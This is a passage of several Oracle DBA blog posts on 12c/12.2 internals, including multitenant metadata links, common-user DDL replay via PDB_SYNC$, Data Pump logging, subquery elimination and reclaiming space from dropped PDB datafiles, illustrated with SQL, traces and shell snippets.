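from ( select v.*,dbms_random.value from DEMOV v)
where x in (select x from DEMO2)
order by n desc
fetch first 10 rows only;

select * from dbms_xplan.display_cursor(null,null,'ALLSTATS LAST');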

 


12c Multitenant Internals: compiling system package from PDB


When I explain the multitenant internals, I show that all metadata about system procedures and packages is stored only in CDB$ROOT and is accessed from the PDBs through metadata links. I take an example with DBMS_SYSTEM, which has nothing in SOURCE$ of the PDB. But I show that we can compile it from the PDB. This is my way to prove that the session can access the system objects, internally switching the session to the root container when it needs to read SOURCE$. At the DOAG Conference I had a very interesting question about what happens exactly in CDB$ROOT: is the session really executing all the DML on the internal tables storing the compiled code of the procedure?

My first answer was something like ‘why not’ because the session in a PDB can switch and do modifications into CDB$ROOT internally. For example, even a local PDB DBA can change some ‘spfile’ parameters which are actually stored in the CDB$ROOT. But then I realized that the question goes further: is the PDB session really compiling the DBMS_SYSTEM package in the CDB$ROOT? Actually, there are some DDL that are transformed to ‘no-operation’ when executed on the PDB.

To see which ones are concerned, the best is to trace:

SQL> alter session set events='10046 trace name context forever, level 4';
Session altered.
SQL> alter session set container=PDB1;
Session altered.
SQL> alter package dbms_system compile;
Package altered.
SQL> alter session set events='10046 trace name context off';
Session altered.

I’ll not show the whole trace here. For sure I can see that the session switches to CDB$ROOT to read the source code of the package:

*** 2017-11-22T08:36:01.963680+01:00 (CDB$ROOT(1))
=====================
PARSING IN CURSOR #140650193204552 len=54 dep=1 uid=0 oct=3 lid=0 tim=5178881528 hv=696375357 ad='7bafeab8' sqlid='9gq78x8ns3q1x'
select source from source$ where obj#=:1 order by line
END OF STMT
PARSE #140650193204552:c=0,e=290,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,plh=0,tim=5178881527
EXEC #140650295606992:c=1000,e=287,p=0,cr=0,cu=0,mis=0,r=0,dep=2,og=4,plh=813480514,tim=5178881999
FETCH #140650295606992:c=0,e=35,p=0,cr=4,cu=0,mis=0,r=1,dep=2,og=4,plh=813480514,tim=5178882057
CLOSE #140650295606992:c=0,e=12,dep=2,type=3,tim=5178882104

That was my point about metadata links. But now about modifications.

As I need to see only the statements, I can use TKPROF to get them aggregated, but then the container switch – like (CDB$ROOT(1)) here – is ignored.

Here is a small AWK script I use to add the Container ID to the SQL ID so that it is visible and detailed in the TKPROF output:

awk '/^[*]{3}/{con=$3}/^PARSING IN/{sub(/sqlid=./,"&"con" ")}{print > "con_"FILENAME }'
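For example (the trace file name is hypothetical), running it against the raw trace writes an annotated copy prefixed with con_:

# writes con_CDB2_ora_12345.trc with the container name inserted in front of each SQL_ID
awk '/^[*]{3}/{con=$3}/^PARSING IN/{sub(/sqlid=./,"&"con" ")}{print > "con_"FILENAME }' CDB2_ora_12345.trc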

Then I run TKPROF on the resulting file, with ‘sort=(execu)’ so that I have the modifications (insert/delete/update) first. The result starts with something like this:

SQL ID: (PDB1(3)) 1gfaj4z5hn1kf Plan Hash: 1110520934
 
delete from dependency$
where
d_obj#=:1

I know that dependencies are replicated into all containers (because table metadata is replicated into all containers), so I see the following tables modified in the PDB: DEPENDENCY$, ACCESS$, DIANA_VERSION$, and of course OBJ$.

But to answer the initial question, there are no modifications done in the CDB$ROOT. Only SELECT statements there, on SOURCE$, SETTINGS$, CODEAUTH$, WARNING_SETTINGS$

So, probably, the updates have been transformed to no-op operations once the session is aware that the source is the same (same signature) and it just reads the compilation status.

Just as a comparison, tracing the same compilation when done on the CDB$ROOT will show inserts/deletes/updates on ARGUMENT$, PROCEDUREINFO$, SETTINGS$, PROCEDUREPLSQL$, IDL_UB1$, IDL_SB4$, IDL_UB2$, IDL_CHAR$, … all those tables storing the compiled code.

So basically, when running DDL on metadata links in a PDB, not all the work is done in the CDB, especially not writing again what is already there (because you always upgrade the CDB$ROOT first). However, up to 12.2 we don’t see a big difference in time. This should change in 18c where the set of DDL to be run on the PDB will be pre-processed to avoid unnecessary operations.

 


impdp logtime=all metrics=y and 12cR2 parallel metadata


A quick post to show why you should always use LOGTIME=ALL METRICS=Y when using Data Pump. Just look at an example showing the timestamp in front of each line and a message about each task completed by the worker:

15-NOV-17 11:48:32.305: W-5 Processing object type DATABASE_EXPORT/SCHEMA/PROCACT_SCHEMA
15-NOV-17 11:48:34.439: W-13 Completed 28 PROCACT_SCHEMA objects in 1 seconds
15-NOV-17 11:48:34.439: W-13 Completed by worker 1 28 PROCACT_SCHEMA objects in 1 seconds
15-NOV-17 11:48:34.440: W-13 Processing object type DATABASE_EXPORT/SCHEMA/TABLE/TABLE
15-NOV-17 11:48:35.472: W-17 Startup took 70 seconds
15-NOV-17 11:48:35.596: W-18 Startup took 70 seconds
15-NOV-17 11:48:35.719: W-20 Startup took 70 seconds
15-NOV-17 11:48:35.841: W-19 Startup took 70 seconds
15-NOV-17 11:48:43.520: W-5 Completed 1714 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 1 39 TABLE objects in 2 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 2 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 3 85 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 4 111 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 5 25 TABLE objects in 1 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 6 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 7 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 8 111 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 9 89 TABLE objects in 5 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 10 74 TABLE objects in 4 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 11 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 12 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 13 34 TABLE objects in 2 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 14 111 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 15 108 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 16 90 TABLE objects in 4 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 17 82 TABLE objects in 4 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 18 40 TABLE objects in 3 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 19 97 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 20 53 TABLE objects in 3 seconds
15-NOV-17 11:48:44.266: W-1 Processing object type DATABASE_EXPORT/SCHEMA/TABLE/TABLE_DATA

Here, I was running an import with PARALLEL=20 and I can see exactly how many tables were processed by each worker. You see it is ‘TABLE’ and not ‘TABLE_DATA’ which is the proof that 12cR2 can import metadata in parallel.

I see no reason not to always use LOGTIME=ALL METRICS=Y, and you will be happy to have this detail if something goes wrong.
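For reference, a sketch of such an import command (the credentials, directory, dump file and log file names are placeholders):

impdp system directory=DATA_PUMP_DIR dumpfile=full_%U.dmp logfile=imp_full.log full=y parallel=20 logtime=all metrics=yes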

 


Naming of archivelog files with non existing top level archivelog directory


In Oracle 12.2, an archive log destination is accepted even if the top-level archive log directory does not exist:

oracle@localhost:/u01/app/oracle/product/12.2.0/dbhome_1/dbs/ [DMK] ls -l /u02/oradata/DMK/
 total 2267920
 drwxr-xr-x. 2 oracle dba        96 Dec  6 05:36 arch ...

Now the database accepts this non-existing archive log destination:

SQL> alter system set log_archive_dest_3='LOCATION=/u02/oradata/DMK/arch/arch2';
System altered.

But not this one, where two directory levels are missing:

SQL> alter system set log_archive_dest_4='LOCATION=/u02/oradata/DMK/arch/arch2/arch4';
 alter system set log_archive_dest_4='LOCATION=/u02/oradata/DMK/arch/arch2/arch4'
 *
 ERROR at line 1:
 ORA-02097: parameter cannot be modified because specified value is invalid
 ORA-16032: parameter LOG_ARCHIVE_DEST_4 destination string cannot be translated
 ORA-07286: sksagdi: cannot obtain device information.
 Linux-x86_64 Error: 2: No such file or directory

The log archive format is set as follows:

SQL> show parameter log_archive_format;
NAME                                 TYPE        VALUE
 ------------------------------------ ----------- ------------------------------
 log_archive_format                   string      %t_%s_%r.dbf
 SQL>

 

Now let’s see what the archive log files look like in log_archive_dest_3:

oracle@localhost:/u01/app/oracle/product/12.2.0/dbhome_1/dbs/ [DMK] ls -l /u02/oradata/DMK/arch/arch2*
 -rw-r-----. 1 oracle dba 3845120 Dec  6 05:36 /u02/oradata/DMK/arch/arch21_5_960106002.dbf

So Oracle just prepends the non-existing directory name to the archive log file name.
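To double-check where the archived logs were actually written, a quick sketch is to query V$ARCHIVED_LOG for that destination:

-- Most recent archived log file names generated for destination 3
select dest_id, sequence#, name
from v$archived_log
where dest_id=3
order by sequence# desc;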

 


12cR2 Subquery Elimination


More and more, we see crazy queries generated by ORM frameworks or BI query generators. They are built to be easily generated rather than to be optimal. Then, the optimizer has to implement more and more transformations to get an efficient execution plan. Here is a new one that appeared in Oracle 12cR2: Subquery Elimination, when the subquery does not filter any rows.

A semi-join is a join where we do not need to match all rows, but only one. We write it with an EXISTS subquery, or with an IN (=ANY or =SOME) one, which is equivalent.
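For example, the IN subquery used below could equally be written with a correlated EXISTS; both express the same semi-join, so the same elimination should apply (a sketch on SCOTT.EMP):

-- Same semi-join as "ename in (select ename from EMP)" written with EXISTS
select *
from EMP e
where exists (select 1 from EMP x where x.ename = e.ename);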

12.1

Here is the behaviour in 12.1.0.2 when the subquery does not filter any rows because it reads the same table as the outer one, without any predicate:
SQL> select * from dbms_xplan.display_cursor(null,null,'allstats last +outline');
PLAN_TABLE_OUTPUT
-----------------
SQL_ID az1jcra46h5ua, child number 1
-------------------------------------
select * from EMP where ename in (select ename from EMP)
 
Plan hash value: 977554918
 
----------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | OMem | 1Mem | Used-Mem |
----------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 14 |00:00:00.01 | 13 | | | |
|* 1 | HASH JOIN SEMI | | 1 | 14 | 14 |00:00:00.01 | 13 | 1098K| 1098K| 889K (0)|
| 2 | TABLE ACCESS FULL| EMP | 1 | 14 | 14 |00:00:00.01 | 7 | | | |
| 3 | TABLE ACCESS FULL| EMP | 1 | 14 | 14 |00:00:00.01 | 6 | | | |
----------------------------------------------------------------------------------------------------------------

We read the same table twice, join all rows, and finally return exactly the same rows as those coming from the first full scan. This is not efficient.

12.2

Here is the same query in 12.2, where we can see that the table is scanned only once because the optimizer knows that the subquery does not filter anything:

SQL> select * from dbms_xplan.display_cursor(null,null,'allstats last +outline');
PLAN_TABLE_OUTPUT
SQL_ID az1jcra46h5ua, child number 0
-------------------------------------
select * from EMP where ename in (select ename from EMP)
 
Plan hash value: 3956160932
 
------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 14 |00:00:00.01 | 9 |
|* 1 | TABLE ACCESS FULL| EMP | 1 | 14 | 14 |00:00:00.01 | 9 |
------------------------------------------------------------------------------------

This is mentioned in the outline hints with ELIMINATE_SQ:

Outline Data
-------------
 
/*+
BEGIN_OUTLINE_DATA
IGNORE_OPTIM_EMBEDDED_HINTS
OPTIMIZER_FEATURES_ENABLE('12.2.0.1')
DB_VERSION('12.2.0.1')
ALL_ROWS
OUTLINE_LEAF(@"SEL$D0DB0F9A")
ELIMINATE_SQ(@"SEL$2")
OUTLINE(@"SEL$1")
OUTLINE(@"SEL$2")
FULL(@"SEL$D0DB0F9A" "EMP"@"SEL$1")
END_OUTLINE_DATA
*/

This feature can be disabled with the following parameter:

SQL> alter session set "_optimizer_eliminate_subquery"=false;
Session altered.

Or with the following hint:

SQL> select * from EMP where ename in (select /*+ NO_ELIMINATE_SQ */ ename from EMP);

Finally, here is what you can see in the CBO (optimizer) trace:

SQE: Trying SQ elimination.
SQE: Trying SQ elimination.
SQE: Query valid for SQ elimination:******* UNPARSED QUERY IS *******
SELECT "EMP"."EMPNO" "EMPNO","EMP"."ENAME" "ENAME","EMP"."JOB" "JOB","EMP"."MGR" "MGR","EMP"."HIREDATE" "HIREDATE","EMP"."SAL" "SAL","EMP"."COMM" "COMM","EMP"."DEPTNO" "DEPTNO" FROM "SCOTT"."EMP" "EMP" WHERE "EMP"."ENAME"=ANY (SELECT "EMP"."ENAME" "ENAME" FROM "SCOTT"."EMP" "EMP")
Registered qb: SEL$D0DB0F9A 0xe7035778 (SUBQUERY ELIMINATE SEL$1; SEL$2)
---------------------
QUERY BLOCK SIGNATURE
---------------------
signature (): qb_name=SEL$D0DB0F9A nbfros=1 flg=0
fro(0): flg=0 objn=73253 hint_alias="EMP"@"SEL$1"
 
SQE: Query after SQ elimination:******* UNPARSED QUERY IS *******
SELECT "EMP"."EMPNO" "EMPNO","EMP"."ENAME" "ENAME","EMP"."JOB" "JOB","EMP"."MGR" "MGR","EMP"."HIREDATE" "HIREDATE","EMP"."SAL" "SAL","EMP"."COMM" "COMM","EMP"."DEPTNO" "DEPTNO" FROM "SCOTT"."EMP" "EMP" WHERE 0=0 AND "EMP"."ENAME" IS NOT NULL

This example is simple and it is obvious that the SQL should be re-written. But with large generated queries, on complex views, this is the kind of thing that can be seen in the resulting query and this transformation will help to avoid unnecessary work.

 



Drop PDB including datafiles may keep files open


I like that Oracle drops the datafiles from the operating system when we remove them from the database (with drop tablespace or drop pluggable database) because I don’t like to have orphan files remaining in the filesystem. However, to ensure that space is reclaimed, we must be sure that Oracle did not leave a process with the file opened. Linux allows you to remove an open file, but then only the directory entry is removed. The consequence is that we no longer see the file, but its space is not reclaimable until the processes close their handles.
Here is a case where I had an issue in 12.2: plugging a PDB is done in parallel, and the parallel processes keep the files open even after we drop the pluggable database.

I have 1.2 GB free on my filesystem:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 1.9G 1.2G 61% /

Plug

I plug a PDB from a PDB archive:
SQL> create pluggable database PDB0
2 using '/u01/app/temp/PDB0.pdb'
3 file_name_convert=('/u01/app/temp','/u02/oradata')
4 /
 
Pluggable database PDB0 created.

Open

In my example the PDB was from an older PSU level. I open it:
SQL> alter pluggable database PDB0 open;
ORA-24344: success with compilation error
 
Pluggable database PDB0 altered.

I got a warning and the PDB is in restricted session mode:
SQL> show pdbs
CON_ID CON_NAME OPEN MODE RESTRICTED
------ ---------- ------------ ----------
2 PDB$SEED READ ONLY NO
3 PDB0 READ WRITE YES
4 PDB1 READ WRITE NO

The reason is that a PSU installed in the CDB$ROOT was not there when the PDB was unplugged:

SQL> select status,message from pdb_plug_in_violations;
STATUS MESSAGE
------ ------------------------------------------------------------------------------------------------------------
PENDING DBRU bundle patch 171017 (DATABASE RELEASE UPDATE 12.2.0.1.171017): Installed in the CDB but not in the PDB.

I can run datapatch, but let’s say that I realize it’s the wrong PDB archive and I want to drop what I’ve imported. Then I expect to reclaim the space in order to be able to import the right one again.

Processes

Before closing the PDB here are all the processes having one of the datafiles opened:
SQL> host for i in $(fuser /u02/oradata/*) ; do ps --no-headers -p $i ; done
/u02/oradata/sysaux01.dbf:
/u02/oradata/system01.dbf:
/u02/oradata/temp01.dbf:
/u02/oradata/undotbs01.dbf:
/u02/oradata/users01.dbf:
6053 ? 00:00:00 ora_dbw0_cdb1
6122 ? 00:00:01 ora_p003_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6120 ? 00:00:01 ora_p002_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6118 ? 00:00:00 ora_p001_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6116 ? 00:00:00 ora_p000_cdb1
6594 ? 00:00:01 oracle_6594_cdb

There is my session shadow process, also the DBWR, and the Pnnn parallel processes that did the copy of the datafiles during the plug.

Close

So, I want to drop it and then I close it:
SQL> alter pluggable database PDB0 close;
 
Pluggable database PDB0 altered.

Close means that all files are closed. Is it true? Actually not:
SQL> host for i in $(fuser /u02/oradata/*) ; do ps --no-headers -p $i ; done
/u02/oradata/sysaux01.dbf:
/u02/oradata/system01.dbf:
/u02/oradata/undotbs01.dbf:
/u02/oradata/users01.dbf:
6122 ? 00:00:01 ora_p003_cdb1
6120 ? 00:00:01 ora_p002_cdb1
6118 ? 00:00:00 ora_p001_cdb1
6116 ? 00:00:00 ora_p000_cdb1

The parallel processes still have the datafiles open. This is probably a bug and I’ll open an SR referencing this blog post.

So I want to reclaim space:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 2.6G 527M 84% /

I expect the 527 MB available to go back to 1.2 GB once I drop the PDB.

Drop including datafiles

I cannot drop the PDB and keep the datafiles, or I’ll get ORA-65179: cannot keep datafiles for a pluggable database that is not unplugged
I don’t want to unplug it but just drop it, so I must mention the ‘including datafiles’ clause:

SQL> drop pluggable database PDB0 including datafiles;
 
Pluggable database PDB0 dropped.

Unfortunately, the space is not reclaimed:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 2.6G 527M 84% /

As you have seen that the Pnnn processes were still there after the close, you know the reason. Linux has removed the directory entry, but the file data is still there in the filesystem until the processes close their handles (or the processes are killed). You can see them with lsof or from the /proc filesystem:

SQL> host find /proc/*/fd -ls 2>/dev/null | grep deleted
79174 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6116/fd/257 -> /u02/oradata/users01.dbf\ (deleted)
79195 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6118/fd/257 -> /u02/oradata/undotbs01.dbf\ (deleted)
79216 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6120/fd/257 -> /u02/oradata/system01.dbf\ (deleted)
79237 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6122/fd/257 -> /u02/oradata/sysaux01.dbf\ (deleted)
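lsof gives the same picture: the +L1 option lists open files whose link count is zero, i.e. deleted but still held open (a sketch):

lsof +L1 | grep /u02/oradata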

On a running CDB I cannot kill the background processes because they may be doing something useful. Until I can restart the instance, the only way to reclaim the space is to truncate those deleted files to zero bytes. I cannot use the file name, which has been deleted, but I can use the /proc link:

SQL> host find /proc/*/fd -ls 2>/dev/null | grep -E " [/]u02[/]oradata[/].* [(]deleted[)]" | awk '{print $11}' | while read f ; do : > $f ; done

And finally space is reclaimed:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 1.9G 1.2G 61% /

So what?

I encountered this issue with a PDB plug, but I’m quite sure we can encounter it in other situations where the parallel processes had opened the PDB datafiles. You can imagine the consequence on a multitenant CDB for DBaaS where you have hundreds of PDBs and constantly create and drop them, probably in an automated way. Space not reclaimed means that at some point the provisioning will fail. I hope this bug will be filed and fixed. Closing a PDB should take care that all processes close the files. The safe way is to include something like what I did, emptying the deleted files, with the proper verification that the old files belong to a dropped PDB.

 


12c Multitenant internals: PDB replay DDL for common users


In multitenant, you can create common Users, Roles, and Profiles. You create them in CDB$ROOT, with the CONTAINER=ALL clause (which is optional because it is the only possible value when connected to CDB$ROOT), but they are visible to all containers. As the goal of multitenant is to avoid duplicating common metadata to all containers, you may think that they are visible through those magic metadata links. But that’s actually wrong: they are simply replicated with a very simple mechanism: the DDL for common objects is replayed into each user PDB.

I’m connected to CDB2’s CDB$ROOT and I have two pluggable databases:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 MOUNTED

PDB1 is opened and PDB2 is closed.

PDB_SYNC$

In this example, I’ll query PDB_SYNC$ which is the table where Oracle stores all DDL for common users, roles, or profiles in order to be able to replay it later:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id=1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 852610 26-jan-17 02:57:26 CTXSYS SYS 5 1 alter user CTXSYS account unlock identified by *^@
1 0 853177 26-jan-17 02:57:34 CTXSYS SYS 5 2 alter user CTXSYS password expire account lock^@
1 0 1405359 26-jan-17 03:31:31 SYSTEM SYS 5 3 alter user system account lock password expire^@
1 0 1408693 23-dec-17 11:34:43 SYS SYS 5 4 alter user sys account unlock identified by *^@
1 0 1408703 23-dec-17 11:34:43 SYSTEM SYS 5 5 alter user system account unlock identified by *^@
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 5

I excluded bitand(flags,8)=8 because it concerns application containers. I query with the containers() clause to show the con_id, but here I keep only con_id=1, which is CDB$ROOT.

You can see some DDL for CTXSYS recorded on January 26th, which is the day when this release (12.2.0.1) was built. I used a template with datafiles to create the CDB with DBCA. And you see some DDL to unlock SYS and SYSTEM on December 23rd when I created the database. You can also see that they are ordered in sequence with REPLAY#.

More interesting is the row with OPCODE=-1, named PDB$LASTREPLAY, which holds the last value of REPLAY#. This means that in this container, CDB$ROOT, all statements with REPLAY#<=5 were run.

With a similar query, I query the opened PDBs:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 5

There is only one row here in CON_ID=3, which is PDB1: the PDB$LASTREPLAY row mentioning that all statements up to REPLAY#=5 have also been run in this container.
I don’t see PDB2 (CON_ID=4) here because the containers() clause cannot query closed containers.

CONTAINER=ALL DDL

I’ll run some common DDL to create a profile, a role and a user:

SQL> create profile C##PROFILE1 limit inactive_account_time 15 container=all;
Profile C##PROFILE1 created.
 
SQL> create role C##ROLE1 container=all;
Role C##ROLE1 created.
 
SQL> create user C##USER1 identified by oracle container=all;
User C##USER1 created.
 
SQL> alter user C##USER1 profile C##PROFILE1;
User C##USER1 altered.
 
SQL> grant C##ROLE1 to C##USER1 container=all;
Grant succeeded.

The C## prefix is mandatory to isolate the common user namespace. You can change it with the common_user_prefix parameter. You can even set it to the empty string, but then you have a risk of namespace collision when you plug a PDB between CDBs having different common profiles or roles.
CONTAINER=ALL is the default and the only possibility when connected to CDB$ROOT, so it is optional. I recommend mentioning it explicitly in order to avoid confusion when running the same DDL in CDB$ROOT and in PDBs.
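As a quick sketch of why the prefix matters, creating a common user without it fails (unless common_user_prefix has been changed):

-- Fails in CDB$ROOT because the name does not start with the common prefix
create user USER1 identified by oracle container=all;
-- => ORA-65096: invalid common user or role name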

All those DDL have been recorded into PDB_SYNC$ and the REPLAY# has been increased:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id=1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 852610 26-jan-17 02:57:26 CTXSYS SYS 5 1 alter user CTXSYS account unlock identified by *^@
1 0 853177 26-jan-17 02:57:34 CTXSYS SYS 5 2 alter user CTXSYS password expire account lock^@
1 0 1405359 26-jan-17 03:31:31 SYSTEM SYS 5 3 alter user system account lock password expire^@
1 0 1408693 23-dec-17 11:34:43 SYS SYS 5 4 alter user sys account unlock identified by *^@
1 0 1408703 23-dec-17 11:34:43 SYSTEM SYS 5 5 alter user system account unlock identified by *^@
1 0 1466615 29-dec-17 09:26:56 C##PROFILE1 SYS 7 6 create profile C##PROFILE1 limit inactive_account_time 15 container=all^@
1 0 1466641 29-dec-17 09:26:57 C##ROLE1 SYS 3 7 create role C##ROLE1 container=all^@
1 0 1466748 29-dec-17 09:26:58 C##USER1 SYS 1 8 create user C##USER1 identified by * container=all^@
1 0 1466812 29-dec-17 09:26:59 C##USER1 SYS 5 9 alter user C##USER1 profile C##PROFILE1^@
1 0 1466853 29-dec-17 09:26:59 C##USER1 C##ROLE1 SYS 10 10 grant C##ROLE1 to C##USER1 container=all^@
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

PDB1 (CON_ID=3) was opened read write, and then has been synchronized (the DDL has been run in the container to create the same profile, role and user) and the PDB$LASTREPLAY has been updated in this container to show that all has been done:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,opcode,replay#;
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

MOUNTED or READ ONLY

I open the PDB2 read only because I want to see what is in PDB_SYNC$ there. But READ ONLY means that the DDL cannot be run because no write is allowed in the local dictionary.

SQL> alter pluggable database PDB2 open read only;
Pluggable database PDB2 altered.

Running the same query as above, I can see that PDB2 (CON_ID=4) is synchronized only up to the statements with REPLAY#=5 because my DDL was not replicated there.
SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,opcode,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 5

Sync at OPEN

When I open PDB2 in read write mode, the DDL can be synchronized:

SQL> alter pluggable database PDB2 open read write force;
Pluggable database PDB2 altered.

At open, the DDL from REPLAY#>5 has been replayed and once opened the PDB is in sync with CDB$ROOT:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,opcode,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

So what?

The common users, roles and profiles are not stored only in CDB$ROOT to be shared, but rather replicated to all PDBs. The DDL is replicated synchronously to all pluggable databases opened read write, and stored into the CDB$ROOT PDB_SYNC$ table to be replayed later when non-synced PDBs are opened. I’ll show in the next post what happens when the DDL is in error.

Note that even when all pluggable databases are opened read write, the DDL statements are stored, and purged only later (once replayed on all PDBs), because they are needed when you create a new PDB and open it. The PDB$SEED has REPLAY#=0 for PDB$LASTREPLAY, which means that all statements will be replayed.
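A quick way to verify this, as a sketch (assuming a SYS session, which is allowed to switch to the read-only seed):
 
SQL> alter session set container=PDB$SEED;
SQL> select name,opcode,replay# from pdb_sync$ where opcode=-1;
SQL> alter session set container=CDB$ROOT;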

This is 12.2.0.1 where this mechanism is only for common users, roles and profiles having DDL in CDB$ROOT. With application containers, more than that is recorded: all DML and DDL run between the ‘begin install/upgrade/patch’ and ‘end install/upgrade/patch’ in the application root. Then, the statements can be replayed into the application PDB with a simple SYNC command. In the future release (18c) we expect to have that application root behavior ported to CDB$ROOT so that we don’t have to run catupgrd.sql in all containers. Then the PDB will probably be patched or upgraded when opened.
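For reference, the application container synchronization mentioned above looks like this (a sketch with hypothetical names MYAPP and APP_PDB1, not part of this demo):
 
SQL> alter session set container=APP_PDB1;
SQL> alter pluggable database application MYAPP sync;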

 

Cet article 12c Multitenant internals: PDB replay DDL for common users est apparu en premier sur Blog dbi services.

12c Multitenant internals: PDB_PLUG_IN_VIOLATIONS


In the previous post https://blog.dbi-services.com/12c-multitenant-internals-pdb-replay-ddl-for-common-users I’ve done some DDL on a common user to show how this is replayed later for PDBs that were not opened at that time. But what happens when one of these DDL statements fails on one PDB?

PDB$LASTREPLAY

In the last post, the C##USER1 common user was created and all pluggable databases (PDB1 with con_id=3 and PDB2 with con_id=4) were opened and synchronized:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where opcode=-1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

When REPLAY# in the PDB is equal to the CDB$ROOT one, this means that there are no additional statements to replicate on the PDB.
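As a side note, here is a sketch (not part of the original demo) to list the opened PDBs that lag behind CDB$ROOT, by comparing their PDB$LASTREPLAY with the root one:
 
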